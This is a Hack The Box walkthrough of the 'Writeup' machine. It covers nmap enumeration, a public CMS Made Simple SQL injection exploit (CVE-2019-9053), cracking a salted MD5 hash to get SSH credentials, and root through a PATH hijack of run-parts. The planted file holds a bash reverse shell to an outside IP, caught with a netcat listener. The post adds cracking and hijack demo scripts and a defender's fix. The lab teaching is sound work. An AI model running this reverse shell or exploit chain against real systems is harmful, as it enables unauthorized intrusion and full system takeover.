Hello fellow hackers, today I'm going to solve the Writeup machine from Hack The Box,
so let's get started!
I started with nmap to check the open ports on the machine (-A adds version detection and the default NSE scripts, which is what picks up robots.txt later on):
nmap -A -v -sT 10.10.10.138

So the machine has two ports open:
1 - SSH on port 22
2 - Apache web server on port 80
So let's check it out!
After opening the web server, it displays a message telling us that the site is not ready yet and that it has already been under attack.

Back to my nmap scan: I noticed that the web server has a robots.txt file that disallows the /writeup directory. Seems interesting? Let's find out.

After checking out the /writeup directory, it looks like a collection of writeups for retired Hack The Box machines. Going through the page source I noticed something interesting: the generator meta tag shows the page was made by a CMS called CMS Made Simple.
I checked for public exploits using searchsploit and found one (EDB-ID 46635, a Python 2 script) that exploits a SQL injection to dump the users table with usernames, emails, salts and password hashes, and can then brute-force the hash against a wordlist. You can look the CVE up: CVE-2019-9053 (CMS Made Simple before 2.2.10).
searchsploit "cms made simple"

I ran the script (my copy was renamed cms.py) with rockyou.txt as the wordlist for the --crack option. Note the target is plain HTTP, since only port 80 is open:
python2 cms.py -u http://10.10.10.138/writeup --crack -w rockyou.txt

And boom! We have it:
the user jkr, his salt and his password hash.
The --crack option tries each word of the wordlist as the salted MD5 and stops at the first match, so after cracking the password here's what we have:
user: jkr
password: raykayjay9
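If you would rather crack the dumped hash offline than let the exploit script do it (for example with a bigger wordlist, or after the box is gone), the check is the same: MD5 of the salt followed by the candidate word, compared with the dumped hash. The function below is an added example, not code from the original post or from the exploit script; the salt, the hash and the three-line wordlist in demo_crack are constructed for the demo, and the salt-then-password ordering is assumed from the exploit script's crack routine. It assumes GNU coreutils md5sum.

```shell
#!/usr/bin/env bash
# Added example, not from the original post or the exploit script. Offline
# check of a salted MD5 of the form md5(salt || password), the check assumed
# from the exploit script's --crack option, against a wordlist.

# Hex MD5 of the salt immediately followed by the password (GNU md5sum assumed).
salted_md5() {
    printf '%s%s' "$1" "$2" | md5sum | cut -d ' ' -f 1
}

# crack_salted_md5 <salt> <hex_hash> <wordlist_file>
# Prints the first word whose salted MD5 equals the target and returns 0;
# returns 1 if the wordlist is exhausted; returns 2 if the hash is malformed.
crack_salted_md5() {
    local salt="$1" target="$2" wordlist="$3" word
    case "$target" in
        *[!0-9a-f]*|"") echo "target must be lowercase hex" >&2; return 2 ;;
    esac
    [ "${#target}" -eq 32 ] || { echo "target must be 32 hex chars" >&2; return 2; }
    # the "|| [ -n "$word" ]" keeps a final line that has no trailing newline
    while IFS= read -r word || [ -n "$word" ]; do
        if [ "$(salted_md5 "$salt" "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Constructed demo: a made-up salt and a tiny wordlist that contains the
# password the writeup recovered. The target hash is built from the known
# password here only so the demo is self-contained; on the box it comes from
# the SQL injection dump. Prints the cracked word.
demo_crack() {
    local tmp salt="5a3c" target rc
    tmp="$(mktemp)" || return 2
    printf 'password\nletmein\nraykayjay9\n' > "$tmp"
    target="$(salted_md5 "$salt" raykayjay9)"   # stands in for the dumped hash
    crack_salted_md5 "$salt" "$target" "$tmp"
    rc=$?
    rm -f "$tmp"
    return $rc
}
```

Point it at the real dump with `crack_salted_md5 <salt> <hash> /usr/share/wordlists/rockyou.txt`; a shell loop spawning md5sum per word is slow on rockyou-sized lists, so for anything serious hand the salt and hash to hashcat or john instead, but the comparison they perform is the one shown here.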
Cool, let's test those creds on SSH!
And boom! We have a shell.

So we are in as jkr and we have user.txt!
After some enumeration nothing interesting caught my attention, so I decided to see what was going on backstage: I used pspy64 to monitor the processes run by all users on the machine, which it can do without root. You can find it on GitHub (https://github.com/DominicBreuker/pspy).
After running the tool with a 1000 ms scan interval I noticed something:
./pspy64 -i 1000

Every time someone logs in to the machine, a job is executed by the root user, and it calls run-parts by its bare name rather than by an absolute path, with a PATH of its own. Since jkr can write to /usr/local/bin, which that PATH searches before /bin, let's abuse that.
First I checked my PATH; it was different from the one the root job ran with (/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin, so /usr/local/bin comes before /bin), so I added the same entries to mine:
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Then I planted a fake run-parts in /usr/local/bin so that root's PATH lookup picks it up instead of /bin/run-parts. It needs the executable bit, otherwise the PATH search skips the file:
printf '#!/bin/bash\nbash -i >& /dev/tcp/10.10.12.92/444 0>&1\n' > /usr/local/bin/run-parts
chmod +x /usr/local/bin/run-parts
Then I started a netcat listener on my machine:
nc -vlp 444
After that I logged out of SSH and logged in again to trigger the job, and there it is, a root shell!
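To see exactly why the planted file wins, the following added example (not code from the original writeup or from the Writeup box) reproduces the PATH hijack in a throwaway directory with no root and no reverse shell. path_hijack_candidates answers the question you asked with pspy, "given the PATH that job runs with, which directories before the real binary can I write to?", and demo_hijack shows a job that sets its own PATH and calls run-parts by bare name executing the fake copy. The directory layout, the fake "real" run-parts and the marker strings are constructed for the demo.

```shell
#!/usr/bin/env bash
# Added example, not from the original writeup. Reproduces the PATH hijack in
# a temp directory: a "privileged" job with its own PATH calls run-parts by
# bare name, and a user-writable directory earlier in that PATH wins.

# Print, in search order, every directory in the PATH string $1 that the
# current user can write to and that is searched BEFORE the directory where
# command $2 is actually found. Each line printed is a place a fake $2
# would be picked up instead of the real one.
path_hijack_candidates() {
    local pathstr="$1" cmd="$2" dir
    local IFS=:
    for dir in $pathstr; do
        [ -z "$dir" ] && dir=.   # an empty PATH entry means the current directory
        if [ -x "$dir/$cmd" ]; then
            break                # first executable match wins; later dirs never matter
        fi
        [ -d "$dir" ] && [ -w "$dir" ] && printf '%s\n' "$dir"
    done
}

# Build a simulated root PATH under a temp dir, mirroring the ordering pspy
# showed for the root job: the real run-parts lives late in the PATH (like
# /bin) and a writable usr/local/bin comes first. Prints whatever the job
# actually executed, so the hijack shows up as a return value.
demo_hijack() {
    local tmp fakepath out
    tmp="$(mktemp -d)" || return 2
    mkdir -p "$tmp/usr/local/bin" "$tmp/bin"
    printf '#!/bin/sh\necho real-run-parts\n' > "$tmp/bin/run-parts"
    chmod +x "$tmp/bin/run-parts"
    fakepath="$tmp/usr/local/sbin:$tmp/usr/local/bin:$tmp/usr/sbin:$tmp/usr/bin:$tmp/sbin:$tmp/bin"

    # Attacker step: an executable with the same bare name in the early,
    # writable directory. On the box this was the reverse shell; here it only
    # prints a marker. Without chmod +x the lookup would skip it.
    printf '#!/bin/sh\necho hijacked\n' > "$tmp/usr/local/bin/run-parts"
    chmod +x "$tmp/usr/local/bin/run-parts"

    # The "privileged job": a clean environment with its own PATH, invoking the
    # tool by bare name exactly as the root job did.
    out="$(env -i PATH="$fakepath" /bin/sh -c 'run-parts')"
    rm -rf "$tmp"
    printf '%s\n' "$out"
}

# Run the demo when executed directly (sourcing the file only defines the functions).
if [ "${BASH_SOURCE[0]}" = "$0" ]; then
    demo_hijack
fi
```

On the real box the interesting call is `path_hijack_candidates "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" run-parts` as jkr: it prints the directories you could plant in, which is how you confirm /usr/local/bin is the spot before writing anything there. The fix on the defender's side is the mirror image: call privileged helpers by absolute path, and don't let non-root groups write into directories that root's PATH searches.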

SMT Red Team